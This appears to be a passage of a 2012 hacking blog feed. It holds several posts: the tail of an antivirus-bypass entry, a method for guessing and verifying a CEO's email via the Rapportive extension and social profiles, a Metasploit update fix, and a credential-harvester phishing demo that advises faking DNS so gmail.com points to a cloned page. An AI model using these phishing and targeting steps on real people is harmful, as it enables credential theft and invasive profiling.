<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-eRnUkkhUJHKpVio8BwRWb5FiCPUyOqoL-18297xjianXHAt38Ly8asXz1puog0a_fo60GIneZjY8oYfS3UK7Z2KOJ2btqvFtI02xP8XNWj4UuHSJMvitggIn3CrjkZLgxMl8_xt9E7iW/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-eRnUkkhUJHKpVio8BwRWb5FiCPUyOqoL-18297xjianXHAt38Ly8asXz1puog0a_fo60GIneZjY8oYfS3UK7Z2KOJ2btqvFtI02xP8XNWj4UuHSJMvitggIn3CrjkZLgxMl8_xt9E7iW/s640/9.png" height="358" width="640" /></a>
<br />
<br />
I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.<br />
<br />
Stay Focused; & Keep exploiting. :)<br />
<br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px; line-height: 18.200000762939453px; text-align: center;"> </span><span dir="ltr" id=":2w5" style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px; line-height: 18.200000762939453px; text-align: center;">You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training: <a href="http://www.infosecinstitute.com/courses/ethical_hacking_training.html" needshandler="needsHandler" style="color: #0065cc; text-decoration: none;">http://www.info<wbr></wbr>secinstitute.co<wbr></wbr>m/courses/ethic<wbr></wbr>al_hacking_trai<wbr></wbr>ning.html</a></span><br />
<br />
Learn Android Pentesting Part 1 From this resource: <a href="http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/">http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/</a><br />
<br />
<br />
<br />
<br />Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com240tag:blogger.com,1999:blog-1976569363702642300.post-58247137167078270802012-08-31T00:07:00.002-07:002012-09-07T02:53:39.557-07:00Contact the CEO of a company with a social approach.<span style="font-family: inherit;">Most of the time when you will send a mail to info@anycompany.com,
believe me there are very less number of chances that you will get a good
response. Reason being as simple as the number of bounces which you email will
get until it reaches the right person. So why not send it directly to
the targeted person.</span><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">Making my words straighter, don’t you think writing this mail
directly to the CEO of that company will do some good? <o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">I was going through some chrome extensions and got something which
can help this deed. Yeah, we can go ahead and get the EMAIL ID of a CEO
directly without any co-operation from any Living Body.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">So for doing this, you have to count on me (only for about 5
minutes) and do what i say. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 13.5pt; margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;">1. <b>Find out the Person</b>: Go to the site of that
company and find out whom you have to deal with, i.e. the person whose email id
you will find out. If you are unlucky, you may not get anything. Don't loose
hope. Go to Google and give some commands at its search bar. Within in a short
span of time, you will hold the name of person whom you have to target. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 13.5pt; margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;">2. <b>Use Rapportive: </b>We will be using <a href="http://rapportive.com/"><span style="color: blue;">Rapportive </span></a>extension
for Reverse Engineering the work, so load your browser with this extension.</span></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;">3. <b>Integrate it with Gmail: </b>Once you have installed Rapportive, open Gmail in a new tab and
you will see a "rapportive" link coming on your screen.</span></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sbBkzH_hZ6dBfSDaGHiELq8rqbLyh44CiWj0T4wNtKZsaBUeeOqyrMIbsTrzmmmb4Kf3NsWb-xaBbUPB7_naxF0V8upyAXMBXaNQvT_gfFAI7tsfUgaKrq_0zXf1aH9NwhkxL91eN6jD/s1600/rapor1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-indent: 0px;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sbBkzH_hZ6dBfSDaGHiELq8rqbLyh44CiWj0T4wNtKZsaBUeeOqyrMIbsTrzmmmb4Kf3NsWb-xaBbUPB7_naxF0V8upyAXMBXaNQvT_gfFAI7tsfUgaKrq_0zXf1aH9NwhkxL91eN6jD/s400/rapor1.PNG" width="400" /></a>
</span></div>
<span style="font-family: inherit;"><br />
You can also integrate it with other your other Social Accounts.<o:p></o:p></span><br />
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;"><br /></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
</div>
<div style="text-align: left;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ngTJz9w9ehIYDRmdiexC-CuA_4gMF3GwJrv7EPwNivi1epsiJZxnFfNB1TZqSDK7rk-_-jyx992dgQqIZzY9OWyxFImPNNPw3PawGTm-EU0W6Ev3jvj607mWaGoFh5I36LnqyG-D2eho/s1600/rappor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ngTJz9w9ehIYDRmdiexC-CuA_4gMF3GwJrv7EPwNivi1epsiJZxnFfNB1TZqSDK7rk-_-jyx992dgQqIZzY9OWyxFImPNNPw3PawGTm-EU0W6Ev3jvj607mWaGoFh5I36LnqyG-D2eho/s320/rappor2.png" width="320" /></a> </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><b>Reverse Engineer the Email IDs: </b>Finally we have to check out some common combinations like <i><span style="color: #cc0000;">firstname.L@company.com, firstname@company.com, firstname.lastname@company.com, firstname.LE@company.com, f.lastname@company.com. </span></i>As you will try, you will get the following two responses:</span><br />
<br />
Example: Rapportive Profile Not Found<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgLS3POtI46dCS0lC59ouBt5Mu56lhdza-McH5tpxpgryvQoaE1b7c77MxG2DvbQTw-otLq1GH6Pg1aesNLoRnX7LGmju8z_Ugd0MhhM8Ch1YXxZ9ws8f2Iq99gwbb6kjt4noThh8oSoX/s1600/r3.png" imageanchor="1" style="font-family: inherit; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgLS3POtI46dCS0lC59ouBt5Mu56lhdza-McH5tpxpgryvQoaE1b7c77MxG2DvbQTw-otLq1GH6Pg1aesNLoRnX7LGmju8z_Ugd0MhhM8Ch1YXxZ9ws8f2Iq99gwbb6kjt4noThh8oSoX/s400/r3.png" width="400" /></a><br />
<br />
<span style="text-indent: 48px;">Example: Rapportive Profile Found</span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_ipBfjGlTRRUZHdLMG27VnguROjUFAhpDAWmbNLVPTLHTQcaTlCLJnQ06FfBEG0czUK9TkkWSOXC2MTxa3yafhBcx-zJl3M7-xWBCp8CZHb-tc9gYsidncvlqSi7EA6dlml_I8LLMzfW/s1600/r4.png" imageanchor="1" style="font-family: inherit; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 48px;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_ipBfjGlTRRUZHdLMG27VnguROjUFAhpDAWmbNLVPTLHTQcaTlCLJnQ06FfBEG0czUK9TkkWSOXC2MTxa3yafhBcx-zJl3M7-xWBCp8CZHb-tc9gYsidncvlqSi7EA6dlml_I8LLMzfW/s400/r4.png" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">Once you have this, you had got their twitter and other accounts.
But the story doesn’t ends up here. For these accounts, you also need to verify
them. If it is a <b>twitter </b>account, check the number of their followers. If the
profile seems to be active and connections are more than 400, then is must be
fine. Reason why I am putting down emphasis on twitter; if you mention anything
with <i><b>@their_twitter_name,</b></i> it will give a direct notification to them.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">Similarly for their <b>LinkedIn </b>account, if they have less than <i>500
connections</i> that may raise points of issues for whether they use it properly or
not? Moreover, whether they accept connections or not?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><b>Google Account</b> can be checked similarly too with the working
status of the profile. Sometimes, even <b>phone number</b> is found but don’t get
greedy. Don’t make a call until you are a good<i> Social Engineer. </i><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">So, with this stuff, I will wish u Best of luck mates. I hope you
are not going to mess up.</span><span style="font-size: medium;"><o:p></o:p></span></div>
Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com190tag:blogger.com,1999:blog-1976569363702642300.post-55743006800408297412012-08-06T07:47:00.002-07:002012-08-06T08:14:20.865-07:00Msfupdate not working with "no version information available" error.<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A few days back while working with my testings and research, i came across an error which was continously depriving me of updating my metasploit framework. Error message was something like this :</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJkoTfkWxpCOt5Q0J6TG2OCBGbOaGy5Ibj38-fwGEGrRMZaVcZOIhW_E18saixqP9JnshC7-rSZNh0Af_JJ08Q7y9LpJBgLl7KJW8bHlpEBA4aTop9yNBJzB-q8oY6W6H7KCatdpYWUmU/s1600/error1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJkoTfkWxpCOt5Q0J6TG2OCBGbOaGy5Ibj38-fwGEGrRMZaVcZOIhW_E18saixqP9JnshC7-rSZNh0Af_JJ08Q7y9LpJBgLl7KJW8bHlpEBA4aTop9yNBJzB-q8oY6W6H7KCatdpYWUmU/s400/error1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
No version available and blah blah blah. For that, i ignored it for a couple of days due to workload and downloaded exploits manually. But when it seemed kiddish to me, i got into roots. I soon realized that the "no version information available" error , here, meant that the library metasploit does not have a version to refer and hence it is not updating to any further version. Was quite kiddish, but realistic too. So i checked its libraries :</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW-ic82sqrHcG9F3WUCJEAOaUga-Lqw18uRaIqGDS6LQkOMMXPHY7eZ2SRb75e-pLu2H1HXk8Gy0KjXP012HyETuU7oVwIoa1jEvnAzo0GIYeTzraqMTRAIbyNJf2Q4-PL5I1N5ATXqgFX/s1600/error2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW-ic82sqrHcG9F3WUCJEAOaUga-Lqw18uRaIqGDS6LQkOMMXPHY7eZ2SRb75e-pLu2H1HXk8Gy0KjXP012HyETuU7oVwIoa1jEvnAzo0GIYeTzraqMTRAIbyNJf2Q4-PL5I1N5ATXqgFX/s400/error2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
libssl.so.0.9.8 do not have a link to /usr/lib/ where as the entire library actually relies on the same. So what we need to do is : </div>
<div class="separator" style="clear: both; text-align: left;">
Backup the library that is erroring msf.</div>
<div class="separator" style="clear: both; text-align: left;">
Create a link between the library msf and /usr/lib/</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Do this : </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXyE2CRjE4z91mIlzZ8ZrwsxduxI0GQuD162iN8qdREQWg2a9QD4yl83RBlwN5ynKZCFX8YmVmL3EEUF7-qLkQu6cBNHTYbs9vaq04Dt3KCJSL-9jD4CSvKzXG3VzR2SwnMD_xdScjvBO/s1600/error3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXyE2CRjE4z91mIlzZ8ZrwsxduxI0GQuD162iN8qdREQWg2a9QD4yl83RBlwN5ynKZCFX8YmVmL3EEUF7-qLkQu6cBNHTYbs9vaq04Dt3KCJSL-9jD4CSvKzXG3VzR2SwnMD_xdScjvBO/s400/error3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once you are done with all this stuff, go ahead and update your metasploit. You will get a smile on your face.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpjGaE-KkXq0_DMEf9eGltWJTdkEZi49wnlGHubTaDLeas3T3-GCg8hB30bxnzEHx43veZKTgFOc-7zV8cM45bZvcYjFp8RqvYS0a-XJL3z9VVfk9sheZZCqC6GZsG8kL699Yb_zKqpY1/s1600/error4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpjGaE-KkXq0_DMEf9eGltWJTdkEZi49wnlGHubTaDLeas3T3-GCg8hB30bxnzEHx43veZKTgFOc-7zV8cM45bZvcYjFp8RqvYS0a-XJL3z9VVfk9sheZZCqC6GZsG8kL699Yb_zKqpY1/s400/error4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So this was how you dont need to put back your actions if you get any error anywhere, just like in case of msf. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Enjoy hacking, enjoy exploitation. :)</div>
<br />
<br />Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com413tag:blogger.com,1999:blog-1976569363702642300.post-58011459209468302832012-07-29T12:10:00.001-07:002015-05-04T00:06:35.327-07:00Email Hacking using Credential Harvester Attack (SET)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
Learn how to write your own hacking tools in python:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://resources.infosecinstitute.com/writing-hacking-tools-with-python-part-1/">http://resources.infosecinstitute.com/writing-hacking-tools-with-python-part-1/ </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This video covers the Credential Harvester Attack of Social Engineering Toolkit, which is basically used for making an Automated clone and get credentials of the victim.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I had done it with a small setup of One machine with backtrack installed and other one being XP as the victim.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='640' height='360' src='https://www.youtube.com/embed/c8hCEYPM5rM?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
However a small issue comes with it. Why the victim will open your IP? </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Well simple, get into the DNS server, or create a fake DNS server and DHCP, and start giving IP with your own authorization. Once you are done with fake DNS, make a fake entry for gmail.com poting to your Fake IP address. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In case any issue comes in between, feel free to contact me at upgoingstaar@gmail.com :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Stay Focused, Keep Hacking.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com202